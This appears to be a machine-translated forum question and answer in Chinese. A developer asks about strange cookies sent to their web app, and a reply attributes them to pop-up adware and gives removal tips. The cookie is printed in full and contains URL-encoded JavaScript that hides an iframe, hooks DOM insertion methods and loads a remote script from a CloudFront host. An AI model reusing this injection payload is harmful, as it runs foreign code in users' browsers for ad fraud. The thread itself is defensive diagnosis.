有些客户通过以下附加Cookie向我们的网络应用发送请求:
vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; _ga=GA1.2.633227847.1500039040; _gid=GA1.2.1587477355.1500039040; _gat_ga_ua2=1; _gat_ga%28'create'%2C'UA-93290101-3'%2C'auto'%2C%22ga_ua2%22%29%3Bga%28'ga_ua2.send'%2C'pageview'%29%3B!function%28%29%7Bfunction%20e%28e%2Ct%29%7Bvar%20d%3Ddocument.createElement%28%22iframe%22%29%3Bd.src%3D%22about%3Ablank%22%2Cd.style.display%3D%22none%22%2Cdocument.body.appendChild%28d%29%2CElement.prototype.appendChild%3Dd.contentWindow.Element.prototype.appendChild%2CElement.prototype.insertBefore%3Dd.contentWindow.Element.prototype.insertBefore%3Bvar%20n%3Ddocument.createElement%28%22script%22%29%3Bn.type%3D%22text%2Fjavascript%22%2Cn.async%3D!0%2Cn.src%3D%22%2F%2Fd323drta3nak2g.cloudfront.net%2Fv1%2Ftaas%3Fid%3D%22%2Be%2B%22%26api_key%3D45918e2d6de38b8deaf7927d277e58d5%26site_id%3D%22%2Bt%2B%22%26disclosure_text%3D%26disclosure_url%3Dhttps%253A%252F%252Fyieldkit.com%252Flegal-notes%252Fterms-of-service%252F%26yk_tag%3Db%22%2C%28document.getElementsByTagName%28%22head%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28n%29%7De%28%22se.prod%26pla%3D1%26si%3D1%26%22%2C%220c4d5f3a79914d97b6011efb4471a249%22%29%2Ce%28%22deals.prod%22%2C%22d7d224892cfe47c7b50aed3bb644057f%22%29%7D%28%29%3B%2F%2F=1;
我们的应用程序不会安装此类cookie。我们使用了一些外部JavaScript,例如Google Analytics,但这些脚本都没有这样做。我们的网站只能通过HTTPS访问,因此不太可能修改MITM请求。
我们使用WAF,这些请求被阻止,客户不满意。
我想,一些恶意浏览器扩展试图利用一些流行的Web引擎漏洞。
有没有人遇到过这样的事情?关于这是做什么的任何想法?
P.S。该cookie的URL解码内容是javascript,其中包含http://yieldkit.com/legal-notes/terms-of-service/的链接,但它们可能只是被诈骗者用来通过攻击获利。
答案 0 :(得分:0)
找到它。此恶意软件执行此操作:http://www.spyware-ru.com/udalit-r-srvtrck-com-reklamu-instruktsiya/(俄语文章)和translated with google translate。
简短摘要:
有一个恶意软件,可以使用适用于Chrome,Firefox和IE的r.srvtrck.com网站创建弹出式广告窗口。此外,它可能会将广告整合到您打开的网站中。
要删除它,您可以使用:
建议检查Windows任务计划程序是否有不需要的任务,定期启动带有恶意软件站点地址的浏览器。